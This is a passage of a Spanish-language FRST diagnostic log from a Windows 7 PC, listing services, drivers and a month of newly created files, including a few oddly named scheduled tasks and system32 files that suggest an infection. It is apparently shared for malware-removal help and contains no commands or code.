bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [157320 2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11102064 2020-04-02] (Microsoft Corporation -> Microsoft Corporation) S4 client_service; C:\Program Files (x86)\VMware\VMware Horizon View Client\ClientService\horizon_client_service.exe [442840 2020-03-24] (VMware, Inc. -> VMware, Inc.) S4 ftnlsv3hv; C:\Program Files\Common Files\VMware\DeviceRedirectionCommon\ftnlsv.exe [280176 2020-02-25] (FabulaTech, LLP -> ) S4 ftscanmgrhv; C:\Program Files\Common Files\VMware\ScannerRedirection\ftscanmgrhv.exe [4369520 2020-02-27] (FabulaTech, LLP -> ) S4 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [127752 2015-02-17] (SurfRight B.V. -> SurfRight B.V.) S4 hmpalertsvc; C:\Program Files (x86)\HitmanPro.Alert\hmpalert.exe [4544456 2019-04-18] (SurfRight B.V. -> SurfRight B.V.) [Archivo no firmado] S4 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2463064 2020-03-14] (Overwolf Ltd -> Overwolf LTD) S4 Secure Hunter Service; C:\Program Files (x86)\SecureHunter\AntiMalwarePro\bin\shrtsrv.exe [47872 2016-11-22] (Secure Hunter LLC -> SecureHunter LLC) [Archivo no firmado] S4 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Archivo no firmado] S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13216784 2020-04-09] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) S4 vmwsprrdpwks; C:\Program Files\Common Files\VMware\SerialPortRedirection\Client\vmwsprrdpwks.exe [459888 2020-02-20] (FabulaTech, LLP -> VMware) R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation) S4 WsAppService3; C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe [83232 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare) S4 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [2108752 2019-10-18] (Wacom Technology Corporation -> Wacom Technology, Corp.) ===================== Controladores (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) R2 amdacpksd; C:\Windows\system32\drivers\amdacpksd.sys [28344 2020-04-01] (Advanced Micro Devices, Inc. -> ) R3 amdhub30; C:\Windows\System32\DRIVERS\amdhub30.sys [117744 2020-04-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, INC.) R0 amdide64; C:\Windows\System32\DRIVERS\amdide64.sys [11944 2012-12-03] (Advanced Micro Devices, Inc. -> Advanced Micro Devices Inc.) R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [65743032 2020-04-01] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [582840 2020-04-01] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 amdxhc; C:\Windows\System32\DRIVERS\amdxhc.sys [237552 2020-04-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, INC.) R0 amd_sata; C:\Windows\System32\DRIVERS\amd_sata.sys [85704 2015-03-30] (Advanced Micro Devices, Inc. -> Advanced Micro Devices) R0 amd_xata; C:\Windows\System32\DRIVERS\amd_xata.sys [43720 2015-03-30] (Advanced Micro Devices, Inc. -> Advanced Micro Devices) R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [105376 2019-07-24] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices) S3 cpuz148; C:\Windows\temp\cpuz148\cpuz148_x64.sys [35360 2020-04-20] (CPUID S.A.R.L.U. -> CPUID) R1 ElRawDisk; C:\Windows\system32\drivers\rsdrvx64.sys [26024 2009-02-12] (EldoS Corporation -> EldoS Corporation) R3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2020-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc) R3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2020-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc) S3 FTSER2K; C:\Windows\System32\drivers\ftser2k.sys [79872 2019-10-18] (Microsoft Windows Hardware Compatibility Publisher -> FTDI Ltd.) S3 hidkmdf; C:\Windows\System32\DRIVERS\hidkmdf.sys [14136 2014-03-17] (Wacom Technology Corp. -> Windows (R) Win 7 DDK provider) R1 hmpalert; C:\Windows\system32\drivers\hmpalert.sys [315800 2019-07-28] (SurfRight B.V. -> SurfRight B.V.) S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (3am.com(Test) -> HTC, Corporation) [Archivo no firmado] R3 L1C; C:\Windows\System32\DRIVERS\L1C62x64.sys [129224 2013-07-18] (Qualcomm Atheros -> Qualcomm Atheros Co., Ltd.) S3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv_x64.sys [44928 2012-10-11] (Microsoft Windows Hardware Compatibility Publisher -> ManyCam LLC) S3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [28160 2013-01-31] (Microsoft Windows Hardware Compatibility Publisher -> ManyCam LLC) S3 MTKSCVAD; C:\Windows\System32\drivers\mtkvadx.sys [44544 2012-07-16] (Ralink Technology, Corp.) [Archivo no firmado] S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-17] (Apple, Inc.) [Archivo no firmado] R3 usbfilter; C:\Windows\System32\DRIVERS\usbfilter.sys [60640 2014-02-16] (Advanced Micro Devices, Inc. -> Advanced Micro Devices) S3 WacHidRouter; C:\Windows\System32\DRIVERS\wachidrouter.sys [134096 2019-10-18] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology, Corp.) S3 WacHidRouterPro; C:\Windows\System32\DRIVERS\wachidrouter.sys [134096 2019-10-18] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology, Corp.) S3 wacomrouterfilter; C:\Windows\System32\DRIVERS\wacomrouterfilter.sys [35256 2019-10-18] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology, Corp.) S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [151184 2016-07-15] (NGO -> MBB) S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S2 AODDriver4.3; \??\C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S2 AODDriver4.3.0; \??\C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [X] S3 DxkgFilter; \??\C:\Program Files (x86)\iDisplay\idisplay.sys [X] S3 netr28ux; system32\DRIVERS\netr28ux.sys [X] S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] S3 WinRing0_1_2_0; \??\C:\Users\Sergio\AppData\Local\Temp\Rar$EXa0.029\OpenHardwareMonitor\OpenHardwareMonitorLib.sys [X] <==== ATENCIÓN ==================== NetSvcs (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) ==================== Un mes (creado) =================== (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.) 2020-04-20 11:28 - 2020-04-20 11:30 - 000033920 _____ C:\Users\Sergio\Downloads\FRST.txt 2020-04-20 11:27 - 2020-04-20 11:29 - 000000000 ____D C:\FRST 2020-04-20 11:24 - 2020-04-20 11:24 - 002281984 _____ (Farbar) C:\Users\Sergio\Downloads\FRST64.exe 2020-04-20 11:20 - 2020-04-20 11:20 - 001965536 _____ (Malwarebytes) C:\Users\Sergio\Downloads\MBSetup.exe 2020-04-20 10:49 - 2020-04-20 10:52 - 000003184 _____ C:\Windows\system32\Tasks\ok 2020-04-20 10:48 - 2020-04-20 10:48 - 000000081 _____ C:\Windows\system32\s 2020-04-20 10:48 - 2020-04-20 10:48 - 000000079 _____ C:\Windows\system32\ps 2020-04-20 10:48 - 2020-04-20 10:48 - 000000077 _____ C:\Windows\system32\p 2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B7E.tmp 2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B6E.tmp 2020-04-20 10:32 - 2020-04-20 10:52 - 000003168 _____ C:\Windows\system32\Tasks\oka 2020-04-20 10:29 - 2020-04-20 10:52 - 000003518 _____ C:\Windows\system32\Tasks\Mysa 2020-04-20 10:29 - 2020-04-20 10:52 - 000003504 _____ C:\Windows\system32\Tasks\Mysa3 2020-04-20 10:29 - 2020-04-20 10:52 - 000003424 _____ C:\Windows\system32\Tasks\Mysa2 2020-04-20 10:29 - 2020-04-20 10:52 - 000003188 _____ C:\Windows\system32\Tasks\Mysa1 2020-04-20 10:25 - 2020-04-20 10:25 - 008196784 _____ (Malwarebytes) C:\Users\Sergio\Downloads\adwcleaner_8.0.4 (1).exe 2020-04-20 10:03 - 2020-04-20 10:03 - 000057771 _____ C:\Users\Sergio\Desktop\sfcdetails.txt 2020-04-20 09:21 - 2020-04-20 09:21 - 000313366 _____ C:\Users\Sergio\Downloads\WindowsUpdateDiagnostic.diagcab 2020-04-20 09:06 - 2020-04-20 09:09 - 564744309 _____ C:\Users\Sergio\Desktop\Windows6.1-KB947821-v34-x64.msu 2020-04-20 08:48 - 2020-04-20 08:48 - 000000000 ____D C:\Users\Sergio\Documents\DriverEasy 2020-04-20 08:31 - 2020-04-20 08:31 - 000282832 _____ C:\Windows\Minidump\042020-23353-01.dmp 2020-04-20 04:54 - 2020-04-20 04:54 - 000282832 _____ C:\Windows\Minidump\042020-28485-01.dmp 2020-04-20 03:24 - 2020-04-20 08:31 - 1424309960 _____ C:\Windows\MEMORY.DMP 2020-04-20 03:24 - 2020-04-20 03:24 - 000282832 _____ C:\Windows\Minidump\042020-21013-01.dmp 2020-04-20 01:07 - 2020-04-20 02:00 - 000000000 ____D C:\Users\Sergio\AppData\Local\Adobe 2020-04-20 01:04 - 2020-04-20 01:04 - 000088138 _____ C:\Users\Sergio\Desktop\cc_20200420_010417.reg 2020-04-20 01:04 - 2020-04-20 01:04 - 000006858 _____ C:\Users\Sergio\Desktop\cc_20200420_010438.reg 2020-04-20 01:04 - 2020-04-20 01:04 - 000000158 _____ C:\Users\Sergio\Desktop\cc_20200420_010454.reg 2020-04-20 00:51 - 2020-04-20 00:51 - 000003480 ____N C:\bootsqm.dat 2020-04-20 00:49 - 2020-04-20 00:49 - 000000000 __SHD C:\found.002 2020-04-19 21:46 - 2020-04-19 22:05 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Geek Uninstaller 2020-04-19 21:45 - 2020-04-19 21:46 - 002665275 _____ C:\Users\Sergio\Downloads\geek.zip 2020-04-19 20:24 - 2020-04-19 20:24 - 008196784 _____ (Malwarebytes) C:\Users\Sergio\Downloads\adwcleaner_8.0.4.exe 2020-04-19 20:13 - 2020-04-19 20:13 - 000002332 _____ C:\Users\Sergio\Desktop\cc_20200419_201319.reg 2020-04-19 20:12 - 2020-04-19 20:12 - 000005044 _____ C:\Users\Sergio\Desktop\cc_20200419_201216.reg 2020-04-19 20:11 - 2020-04-19 20:11 - 000065940 _____ C:\Users\Sergio\Desktop\cc_20200419_201112.reg 2020-04-19 20:10 - 2020-04-19 20:10 - 000455762 _____ C:\Users\Sergio\Desktop\cc_20200419_201006.reg 2020-04-18 17:15 - 2020-04-18 17:15 - 009722797 _____ C:\Users\Sergio\Desktop\CrystalDiskInfo8_4_2.zip 2020-04-18 02:15 - 2020-04-18 02:15 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\AMD 2020-04-18 00:16 - 2020-04-18 00:16 - 000000000 ____D C:\Program Files\Common Files\ATI Technologies 2020-04-18 00:10 - 2020-04-18 00:10 - 000000000 ____D C:\MATS 2020-04-18 00:09 - 2020-04-18 00:09 - 000221662 _____ C:\Users\Sergio\Downloads\MicrosoftProgram_Install_and_Uninstall.meta (1).diagcab 2020-04-18 00:03 - 2020-04-18 00:03 - 000221662 _____ C:\Users\Sergio\Downloads\MicrosoftProgram_Install_and_Uninstall.meta.diagcab 2020-04-17 23:26 - 2020-04-17 23:26 - 000000000 ____D C:\ProgramData\AMD 2020-04-17 23:22 - 2020-04-17 23:22 - 695365008 _____ (AMD Inc.) C:\Users\Sergio\Downloads\win7-radeon-software-adrenalin-2020-edition-20.1.3-jan29.exe 2020-04-17 23:20 - 2020-04-18 00:22 - 000000000 ____D C:\Users\Sergio\AppData\Local\AMD 2020-04-17 23:11 - 2020-04-17 23:11 - 000003072 _____ C:\Windows\system32\Tasks\StartDVR 2020-04-17 23:10 - 2020-04-17 23:11 - 000003152 _____ C:\Windows\system32\Tasks\StartCN 2020-04-17 22:47 - 2020-04-17 22:47 - 014974024 _____ (Microsoft Corporation) C:\Users\Sergio\Downloads\VC_redist.x64.exe 2020-04-17 22:40 - 2020-04-17 22:41 - 689402656 _____ (AMD Inc.) C:\Users\Sergio\Downloads\win7-radeon-software-adrenalin-2020-edition-20.2.2-mar5.exe 2020-04-17 22:30 - 2020-04-17 22:31 - 688496448 _____ (AMD Inc.) C:\Users\Sergio\Downloads\win7-radeon-software-adrenalin-2020-edition-20.4.1-apr2.exe 2020-04-17 22:03 - 2020-04-17 22:03 - 002474680 _____ (Advanced Micro Devices, Inc.) C:\Users\Sergio\Downloads\amdcleanuputility.exe 2020-04-17 21:53 - 2020-04-17 21:53 - 040537960 _____ (AMD Inc.) C:\Users\Sergio\Downloads\radeon-software-adrenalin-2020-20.2.2-minimalsetup-200304_web.exe 2020-04-17 21:25 - 2020-04-17 21:25 - 000050808 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LUsbFilt.sys 2020-04-17 21:24 - 2020-04-17 21:24 - 000000000 ____D C:\Windows\SysWOW64\RTCOM 2020-04-17 21:24 - 2020-04-17 21:24 - 000000000 ____D C:\Windows\system32\SRSLabs 2020-04-17 21:24 - 2020-04-17 21:24 - 000000000 ____D C:\Program Files\Realtek 2020-04-17 21:23 - 2020-04-17 21:23 - 003168280 _____ (DTS, Inc.) C:\Windows\system32\sltech64.dll 2020-04-17 21:22 - 2020-04-17 21:23 - 003445640 _____ (DTS, Inc.) C:\Windows\system32\slcnt64.dll 2020-04-17 21:21 - 2020-04-17 21:22 - 001110072 _____ (DTS, Inc.) C:\Windows\system32\sl3apo64.dll 2020-04-17 21:21 - 2020-04-17 21:21 - 000873352 _____ (TOSHIBA Corporation) C:\Windows\system32\tadefxapo264.dll 2020-04-17 21:21 - 2020-04-17 21:21 - 000692056 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtDataProc64.dll 2020-04-17 21:21 - 2020-04-17 21:21 - 000158592 _____ (TOSHIBA Corporation) C:\Windows\system32\tadefxapo.dll 2020-04-17 21:21 - 2020-04-17 21:21 - 000075432 _____ (TOSHIBA CORPORATION.) C:\Windows\system32\tepeqapo64.dll 2020-04-17 21:20 - 2020-04-17 21:21 - 001382128 _____ (TOSHIBA Corporation) C:\Windows\system32\tosade.dll 2020-04-17 21:09 - 2020-04-17 21:20 - 038636585 _____ C:\Windows\system32\Drivers\RTAIODAT.DAT 2020-04-17 21:08 - 2020-04-17 21:09 - 000392768 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEP64A.dll 2020-04-17 21:08 - 2020-04-17 21:08 - 000220280 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEED64A.dll 2020-04-17 21:08 - 2020-04-17 21:08 - 000116432 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEL64A.dll 2020-04-17 21:08 - 2020-04-17 21:08 - 000093800 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEG64A.dll 2020-04-17 21:07 - 2020-04-17 21:07 - 000327168 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DHT64.dll 2020-04-17 21:07 - 2020-04-17 21:07 - 000327168 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DAA64.dll 2020-04-17 21:06 - 2020-04-17 21:07 - 000343600 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtlCPAPI64.dll 2020-04-17 21:06 - 2020-04-17 21:06 - 001353216 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTCOM64.dll 2020-04-17 21:06 - 2020-04-17 21:06 - 000192872 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCfg64.dll 2020-04-17 21:05 - 2020-04-17 21:06 - 003353720 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkApi64.dll 2020-04-17 21:04 - 2020-04-17 21:05 - 002930256 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RCoInstII64.dll 2020-04-17 21:04 - 2020-04-17 21:04 - 000023800 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCoLDR64.dll 2020-04-17 21:03 - 2020-04-17 21:04 - 003159880 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtPgEx64.dll 2020-04-17 21:02 - 2020-04-17 21:03 - 003769296 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RltkAPO64.dll 2020-04-17 20:54 - 2020-04-17 20:55 - 003677176 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTSnMg64.cpl 2020-04-17 20:50 - 2020-04-17 20:53 - 007281960 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RTKVHD64.sys 2020-04-17 20:50 - 2020-04-17 20:50 - 000122424 _____ (Real Sound Lab SIA) C:\Windows\system32\CONEQMSAPOGUILibrary.dll 2020-04-17 20:47 - 2020-04-17 21:25 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys 2020-04-17 20:47 - 2020-04-17 20:47 - 000063096 _____ (Logitech, Inc.) C:\Windows\system32\LMouFiltCoInst.dll 2020-04-17 20:46 - 2020-04-17 20:47 - 001854072 _____ (Logitech, Inc.) C:\Windows\system32\LkmdfCoInst.dll 2020-04-17 20:46 - 2020-04-17 20:46 - 000086648 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LHidFilt.Sys 2020-04-17 20:46 - 2020-04-17 20:46 - 000069240 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LMouFilt.Sys 2020-04-17 20:44 - 2020-04-17 20:44 - 000117744 _____ (Advanced Micro Devices, INC.) C:\Windows\system32\Drivers\amdhub30.sys 2020-04-17 20:44 - 2020-04-17 20:44 - 000065408 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronHub3.sys 2020-04-17 20:43 - 2020-04-17 20:43 - 000237552 _____ (Advanced Micro Devices, INC.) C:\Windows\system32\Drivers\amdxhc.sys 2020-04-17 19:50 - 2020-04-20 08:42 - 000001011 _____ C:\Users\Public\Desktop\Driver Easy.lnk 2020-04-17 19:50 - 2020-04-20 08:42 - 000001011 _____ C:\ProgramData\Desktop\Driver Easy.lnk 2020-04-17 19:50 - 2020-04-17 21:29 - 000000408 _____ C:\Windows\Tasks\Driver Easy Scheduled Scan.job 2020-04-17 19:50 - 2020-04-17 19:50 - 000003816 _____ C:\Windows\system32\Tasks\Driver Easy Scheduled Scan 2020-04-17 19:50 - 2020-04-17 19:50 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Easeware 2020-04-17 19:50 - 2020-04-17 19:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Easy 2020-04-17 19:50 - 2020-04-17 19:50 - 000000000 ____D C:\Program Files\Easeware 2020-04-17 16:56 - 2020-04-17 16:56 - 000000000 ____D C:\Users\Sergio\AppData\Local\TeamViewer 2020-04-17 16:55 - 2020-04-20 08:31 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2020-04-17 16:55 - 2020-04-17 17:35 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\TeamViewer 2020-04-17 16:55 - 2020-04-17 16:55 - 000001043 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer.lnk 2020-04-17 16:55 - 2020-04-17 16:55 - 000001031 _____ C:\Users\Public\Desktop\TeamViewer.lnk 2020-04-17 16:55 - 2020-04-17 16:55 - 000001031 _____ C:\ProgramData\Desktop\TeamViewer.lnk 2020-04-17 12:45 - 2020-04-17 12:46 - 027347176 _____ (TeamViewer Germany GmbH) C:\Users\Sergio\Downloads\TeamViewer_Setup.exe 2020-04-10 12:27 - 2020-04-10 12:27 - 000000000 __SHD C:\found.001 2020-04-09 22:47 - 2020-04-09 22:47 - 035805130 _____ C:\Users\Sergio\Downloads\Edesa URBAN-V2X Dishwasher.pdf 2020-04-09 18:50 - 2020-04-09 18:50 - 011414395 _____ C:\Users\Sergio\Downloads\Defraggler-All.Edition-Portable.rar 2020-04-09 18:34 - 2020-04-09 18:34 - 000121069 _____ C:\Users\Sergio\Downloads\dd3a06ea-453f-4352-a252-9cf63a952cc2.tmp 2020-04-09 18:33 - 2020-04-09 18:33 - 000055897 _____ C:\Users\Sergio\Downloads\memtest86+-5.01.zip 2020-04-09 18:15 - 2020-04-09 18:15 - 000524912 _____ C:\Users\Sergio\Downloads\openhardwaremonitor-v0.9.2.zip 2020-04-09 17:55 - 2020-04-09 17:55 - 000000000 __SHD C:\found.000 2020-04-08 14:08 - 2020-04-08 14:59 - 000001352 _____ C:\Users\Public\Desktop\Wondershare Filmora9.lnk 2020-04-08 14:08 - 2020-04-08 14:59 - 000001352 _____ C:\ProgramData\Desktop\Wondershare Filmora9.lnk 2020-04-08 14:08 - 2020-04-08 14:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare 2020-04-08 14:07 - 2020-04-18 02:01 - 000000000 ____D C:\ProgramData\Wondershare Filmora 2020-04-08 13:34 - 2020-04-08 14:53 - 000000000 ____D C:\ProgramData\Wondershare Video Editor 2020-04-08 13:33 - 2020-04-08 16:59 - 000000000 ____D C:\Users\Sergio\Downloads\Filmora - Efectos 2020-04-08 12:53 - 2020-04-08 14:07 - 000000000 ____D C:\Program Files\Wondershare 2020-04-08 11:27 - 2020-04-08 11:27 - 000000000 ____D C:\Users\Sergio\Downloads\Filmo 2020 2020-04-08 11:23 - 2020-04-08 11:23 - 277301788 _____ C:\Users\Sergio\Downloads\Filmo 2020.rar 2020-04-08 10:53 - 2020-04-18 02:01 - 000000000 ____D C:\Users\Sergio\Documents\Wondershare Filmora 9 2020-04-08 10:51 - 2020-04-08 10:55 - 000000000 ____D C:\Users\Public\Documents\iSkysoft 2020-04-08 10:51 - 2020-04-08 10:55 - 000000000 ____D C:\ProgramData\Documents\iSkysoft 2020-04-02 14:53 - 2020-04-02 15:19 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\ZHP 2020-04-02 14:53 - 2020-04-02 14:53 - 000000820 _____ C:\Users\Sergio\Desktop\ZHPSuite.lnk 2020-04-02 14:53 - 2020-04-02 14:53 - 000000000 ____D C:\Users\Sergio\AppData\Local\ZHP 2020-04-01 21:51 - 2020-04-01 21:51 - 052394168 _____ C:\Windows\SysWOW64\amd_comgr32.dll 2020-04-01 21:50 - 2020-04-01 21:50 - 062858424 _____ C:\Windows\system32\amd_comgr.dll 2020-04-01 21:48 - 2020-04-01 21:48 - 000335544 _____ C:\Windows\system32\clinfo.exe 2020-04-01 21:48 - 2020-04-01 21:48 - 000126136 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll 2020-04-01 21:48 - 2020-04-01 21:48 - 000112312 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll 2020-04-01 21:47 - 2020-04-01 21:47 - 079081656 _____ (Advanced Micro Devices Inc.) C:\Windows\system32\amdocl64.dll 2020-04-01 21:47 - 2020-04-01 21:47 - 065465016 _____ (Advanced Micro Devices Inc.) C:\Windows\SysWOW64\amdocl.dll 2020-04-01 21:47 - 2020-04-01 21:47 - 026733752 _____ (Advanced Micro Devices Inc.) C:\Windows\system32\amdocl12cl64.dll 2020-04-01 21:47 - 2020-04-01 21:47 - 021286072 _____ (Advanced Micro Devices Inc.) C:\Windows\SysWOW64\amdocl12cl.dll 2020-04-01 21:46 - 2020-04-01 21:46 - 078642360 _____ (Advanced Micro Devices Inc.) C:\Windows\system32\amdhip64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 026035128 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atidxx64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 021825512 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atidxx32.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 001919600 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\aticfx64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 001565744 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\aticfx32.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000565432 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Rapidfire64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000476344 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\Rapidfire.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000350392 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\ATIODE.exe 2020-04-01 21:45 - 2020-04-01 21:45 - 000175288 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantle64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000153784 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantleaxl64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000144056 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantle32.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000129208 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantleaxl32.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000068792 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\ATIODCLI.exe 2020-04-01 21:45 - 2020-04-01 21:45 - 000038072 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\RapidFireServer64.dll 2020-04-01 21:45 - 2020-04-01 21:45 - 000035000 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\RapidFireServer.dll 2020-04-01 21:44 - 2020-04-01 21:44 - 034385080 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmantle64.dll 2020-04-01 21:44 - 2020-04-01 21:44 - 029762744 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmantle32.dll 2020-04-01 21:44 - 2020-04-01 21:44 - 000932536 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdlvr64.dll 2020-04-01 21:44 - 2020-04-01 21:44 - 000759992 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdlvr32.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 013731296 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atiumd6a.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 013041184 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atiumdva.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 001775288 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe 2020-04-01 21:43 - 2020-04-01 21:43 - 001775288 _____ C:\Windows\system32\vulkaninfo.exe 2020-04-01 21:43 - 2020-04-01 21:43 - 001365688 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2020-04-01 21:43 - 2020-04-01 21:43 - 001365688 _____ C:\Windows\SysWOW64\vulkaninfo.exe 2020-04-01 21:43 - 2020-04-01 21:43 - 001076712 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 001076712 _____ C:\Windows\system32\vulkan-1.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000935560 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000935560 _____ C:\Windows\SysWOW64\vulkan-1.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000162920 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amduve64.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000139224 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amduve32.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000124432 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdave64.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000118264 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atimpc64.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000118264 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdpcom64.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000109488 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdave32.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000097616 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atimpc32.dll 2020-04-01 21:43 - 2020-04-01 21:43 - 000097616 _____ (Advanced Micro Devices, Inc. ) 